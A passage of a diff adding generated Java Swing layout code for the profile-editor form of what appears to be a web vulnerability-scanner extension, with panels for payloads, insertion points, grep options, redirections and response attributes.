+ .addComponent(jScrollPane3, javax.swing.GroupLayout.DEFAULT_SIZE, 591, Short.MAX_VALUE)))
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(button6, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(textfield1, javax.swing.GroupLayout.PREFERRED_SIZE, 591, javax.swing.GroupLayout.PREFERRED_SIZE)))
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel22)
+ .addComponent(jLabel23, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel54)
+ .addComponent(jLabel55, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(extensionprovided)
+ .addComponent(header)
+ .addComponent(urlpathfilename)
+ .addComponent(entirebody)
+ .addComponent(paramxml)
+ .addComponent(All))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(paramjson)
+ .addComponent(parambody)
+ .addComponent(paramcookie)
+ .addComponent(urlpathfolder)
+ .addComponent(paramamf))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(parammultipartattr)
+ .addComponent(paramnamebody)
+ .addComponent(paramnameurl)
+ .addComponent(userprovided)
+ .addComponent(paramurl)))
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(paramxmlattr)
+ .addGap(18, 18, 18)
+ .addComponent(unknown)))
+ .addGap(158, 158, 158)))))
+ .addGap(0, 0, Short.MAX_VALUE))
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGap(6, 6, 6)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
+ .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(button18, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button19, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 830, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addComponent(jLabel53, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel52, javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
+ .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel10Layout.createSequentialGroup()
+ .addComponent(check8)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(text5))
+ .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(jButton9, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(jButton6, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(jButton8, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(jButton7, javax.swing.GroupLayout.PREFERRED_SIZE, 93, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(12, 12, 12)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(jScrollPane4)
+ .addComponent(combo2, 0, 447, Short.MAX_VALUE)))))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, 13, Short.MAX_VALUE))
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel5)
+ .addComponent(jLabel19, javax.swing.GroupLayout.PREFERRED_SIZE, 704, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGap(47, 47, 47)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(jLabel10)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
+ .addComponent(append)
+ .addComponent(replace)))
+ .addComponent(jLabel11)
+ .addComponent(jLabel17, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))))
+ .addGap(0, 0, Short.MAX_VALUE))))
+ .addComponent(jSeparator4))
+ .addContainerGap())
+ );
+
+ jPanel10Layout.linkSize(javax.swing.SwingConstants.HORIZONTAL, new java.awt.Component[] {combo2, jScrollPane4});
+
+ jPanel10Layout.setVerticalGroup(
+ jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGap(19, 19, 19)
+ .addComponent(jLabel5)
+ .addGap(12, 12, 12)
+ .addComponent(jLabel19)
+ .addGap(27, 27, 27)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(textpayloads, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button3))
+ .addGap(25, 25, 25)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(button2)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button4)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button5))
+ .addComponent(jScrollPane3, javax.swing.GroupLayout.PREFERRED_SIZE, 111, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(button6)
+ .addComponent(textfield1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator2, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel54)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel55)
+ .addGap(19, 19, 19)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(replace)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(append))
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGap(17, 17, 17)
+ .addComponent(jLabel10)))
+ .addGap(30, 30, 30)
+ .addComponent(jLabel11)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(paramamf)
+ .addComponent(parammultipartattr)
+ .addComponent(All))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(parambody)
+ .addComponent(paramnamebody)
+ .addComponent(urlpathfilename))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(extensionprovided)
+ .addComponent(paramcookie)
+ .addComponent(paramurl))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(header)
+ .addComponent(paramjson)
+ .addComponent(paramnameurl))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(entirebody)
+ .addComponent(urlpathfolder)
+ .addComponent(userprovided))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(paramxml)
+ .addComponent(paramxmlattr)
+ .addComponent(unknown))
+ .addGap(28, 28, 28)
+ .addComponent(jLabel17, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator4, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel52)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel53)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(button19)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button18))
+ .addComponent(jScrollPane14, javax.swing.GroupLayout.PREFERRED_SIZE, 190, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator3, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel22)
+ .addGap(12, 12, 12)
+ .addComponent(jLabel23)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addComponent(jButton9)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jButton8)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jButton7))
+ .addComponent(jScrollPane4, javax.swing.GroupLayout.PREFERRED_SIZE, 99, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(combo2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jButton6))
+ .addGap(19, 19, 19)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(check8)
+ .addComponent(text5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addContainerGap(25, Short.MAX_VALUE))
+ );
+
+ headerstab.addTab(" Request ", jPanel10);
+
+ jPanel11.setAutoscrolls(true);
+
+ button8.setText("Load File");
+ button8.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ loadGrep(evt);
+ }
+ });
+
+ button9.setText("Remove");
+ button9.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removeGrep(evt);
+ }
+ });
+
+ button10.setText("Clear");
+ button10.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removeAllGrep(evt);
+ }
+ });
+
+ button11.setText("Add");
+ button11.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ setToGrep(evt);
+ }
+ });
+
+ list2.setModel(grep);
+ jScrollPane2.setViewportView(list2);
+
+ button7.setText("Paste");
+ button7.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ pasteGrep(evt);
+ }
+ });
+
+ buttonGroup4.add(radio12);
+ radio12.setText("Payload");
+ radio12.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ payloadMatchType(evt);
+ }
+ });
+
+ buttonGroup4.add(radio4);
+ radio4.setText("Simple string");
+ radio4.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ stringMatchType(evt);
+ }
+ });
+
+ buttonGroup4.add(radio3);
+ radio3.setText("Regex");
+ radio3.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ regexMatchType(evt);
+ }
+ });
+
+ buttonGroup4.add(radio22);
+ radio22.setText("Payload without encode");
+ radio22.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ payloadencodeMatchType(evt);
+ }
+ });
+
+ check4.setText("Negative match");
+
+ check1.setText("Case sensitive");
+
+ excludehttp.setText("Exclude HTTP headers");
+
+ onlyhttp.setText("Only in HTTP headers");
+
+ check71.setText("Content type");
+
+ check72.setText("Status code");
+
+ negativeCT.setText("Negative match");
+
+ negativeRC.setText("Negative match");
+
+ jLabel16.setText("Seconds");
+
+ jLabel24.setText("You can define one or more greps. For each payload response, each grep will be searched with specific grep options.");
+
+ jLabel25.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel25.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel25.setText("Grep Sets");
+
+ jLabel26.setText("You can define grep type.");
+
+ jLabel27.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel27.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel27.setText("Match Type");
+
+ jLabel28.setText("You can define how your profile handles redirections.");
+
+ jLabel29.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel29.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel29.setText("Redirections");
+
+ jLabel30.setText("These settings can be used to specify grep options of your profile.");
+
+ jLabel31.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel31.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel31.setText("Grep Options");
+
+ buttonGroup8.add(rb1);
+ rb1.setText("Never");
+
+ buttonGroup8.add(rb2);
+ rb2.setText("On-site only");
+
+ buttonGroup8.add(rb3);
+ rb3.setText("In-scope only");
+
+ buttonGroup8.add(rb4);
+ rb4.setText("Always");
+
+ jLabel2.setText("Max redirections:");
+
+ buttonGroup4.add(radiotime);
+ radiotime.setText("Timeout equal or more than ");
+ radiotime.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ TimeoutSelect(evt);
+ }
+ });
+
+ jLabel6.setText("Follow redirections: ");
+
+ jLabel42.setText("Bytes");
+
+ buttonGroup4.add(radiocl);
+ radiocl.setText("Content Length difference");
+ radiocl.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ radioclSelect(evt);
+ }
+ });
+ radiocl.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ radioclActionPerformed(evt);
+ }
+ });
+
+ buttonGroup4.add(variationsRadio);
+ variationsRadio.setText("Variations");
+ variationsRadio.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ variations(evt);
+ }
+ });
+
+ buttonGroup4.add(invariationsRadio);
+ invariationsRadio.setText("Invariations");
+ invariationsRadio.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ invariations(evt);
+ }
+ });
+
+ Attributes.setBorder(javax.swing.BorderFactory.createTitledBorder(null, "Attributes", javax.swing.border.TitledBorder.CENTER, javax.swing.border.TitledBorder.TOP));
+
+ status_code.setText("status_code");
+
+ input_image_labels.setText("input_image_labels");
+
+ non_hidden_form_input_types.setText("non_hidden_form_input_types");
+
+ page_title.setText("page_title");
+
+ visible_text.setText("visible_text");
+
+ button_submit_labels.setText("button_submit_labels");
+
+ div_ids.setText("div_ids");
+
+ word_count.setText("word_count");
+
+ content_type.setText("content_type");
+
+ outbound_edge_tag_names.setText("outbound_edge_tag_names");
+
+ location.setText("location");
+
+ css_classes.setText("css_classes");
+
+ last_modified_header.setText("last_modified_header");
+
+ set_cookie_names.setText("set_cookie_names");
+
+ line_count.setText("line_count");
+
+ comments.setText("comments");
+
+ tag_ids.setText("tag_ids");
+
+ header_tags.setText("header_tags");
+
+ content_length.setText("content_length");
+
+ visible_word_count.setText("visible_word_count");
+
+ whole_body_content.setText("whole_body_content");
+
+ etag_header.setText("etag_header");
+
+ first_header_tag.setText("first_header_tag");
+
+ tag_names.setText("tag_names");
+
+ input_submit_labels.setText("input_submit_labels");
+
+ outbound_edge_count.setText("outbound_edge_count");
+
+ content_location.setText("content_location");
+
+ initial_body_content.setText("initial_body_content");
+
+ limited_body_content.setText("limited_body_content");
+
+ canonical_link.setText("canonical_link");
+
+ anchor_labels.setText("anchor_labels");
+
+ javax.swing.GroupLayout AttributesLayout = new javax.swing.GroupLayout(Attributes);
+ Attributes.setLayout(AttributesLayout);
+ AttributesLayout.setHorizontalGroup(
+ AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(page_title)
+ .addComponent(non_hidden_form_input_types)
+ .addComponent(input_image_labels)
+ .addComponent(status_code)
+ .addComponent(visible_text)
+ .addComponent(word_count)
+ .addComponent(div_ids)
+ .addComponent(button_submit_labels))
+ .addGap(18, 18, 18)
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(content_type)
+ .addComponent(outbound_edge_tag_names)
+ .addComponent(anchor_labels)
+ .addComponent(etag_header)
+ .addComponent(whole_body_content)
+ .addComponent(content_length)
+ .addComponent(visible_word_count)
+ .addComponent(header_tags))
+ .addGap(18, 18, 18)
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(input_submit_labels)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(tag_names)
+ .addComponent(first_header_tag)
+ .addComponent(set_cookie_names)
+ .addComponent(line_count)
+ .addComponent(comments)
+ .addComponent(tag_ids)
+ .addComponent(last_modified_header))
+ .addGap(18, 18, 18)
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(outbound_edge_count)
+ .addComponent(initial_body_content)
+ .addComponent(css_classes)
+ .addComponent(canonical_link)
+ .addComponent(limited_body_content)
+ .addComponent(content_location)
+ .addComponent(location))))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+ AttributesLayout.setVerticalGroup(
+ AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addComponent(outbound_edge_count)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(initial_body_content)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(content_location)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(limited_body_content)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(canonical_link)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(css_classes)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(location)
+ .addGap(0, 0, Short.MAX_VALUE))
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addComponent(content_type)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(outbound_edge_tag_names)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(anchor_labels)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(whole_body_content)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(etag_header))
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addComponent(tag_ids)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(comments)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(line_count)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(set_cookie_names)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(last_modified_header)))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(AttributesLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addComponent(visible_word_count)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(content_length)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(header_tags))
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addComponent(first_header_tag)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(tag_names)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(input_submit_labels))))
+ .addGroup(AttributesLayout.createSequentialGroup()
+ .addComponent(status_code)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(input_image_labels)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(non_hidden_form_input_types)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(page_title)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(visible_text)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button_submit_labels)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(div_ids)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(word_count)))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))))
+ );
+
+ javax.swing.GroupLayout jPanel11Layout = new javax.swing.GroupLayout(jPanel11);
+ jPanel11.setLayout(jPanel11Layout);
+ jPanel11Layout.setHorizontalGroup(
+ jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jSeparator5)
+ .addComponent(jSeparator6, javax.swing.GroupLayout.Alignment.TRAILING)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addGap(8, 8, 8)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addComponent(button8, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, 591, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(button7, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(button9, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 87, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button10, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(button11, javax.swing.GroupLayout.PREFERRED_SIZE, 87, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(textfield2, javax.swing.GroupLayout.PREFERRED_SIZE, 442, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jScrollPane2, javax.swing.GroupLayout.PREFERRED_SIZE, 591, javax.swing.GroupLayout.PREFERRED_SIZE)))))
+ .addComponent(jLabel25)
+ .addComponent(jLabel24, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel27)
+ .addComponent(jLabel26, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(Attributes, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(variationsRadio))
+ .addGap(0, 0, Short.MAX_VALUE))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addComponent(jSeparator12, javax.swing.GroupLayout.DEFAULT_SIZE, 1, Short.MAX_VALUE)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jSeparator11, javax.swing.GroupLayout.PREFERRED_SIZE, 952, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addContainerGap()
+ .addComponent(radio12)
+ .addGap(151, 151, 151)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(radio22)
+ .addComponent(invariationsRadio)))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(radio4)
+ .addComponent(radio3))
+ .addGap(116, 116, 116)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(radiotime)
+ .addComponent(radiocl))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(texttime, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE)
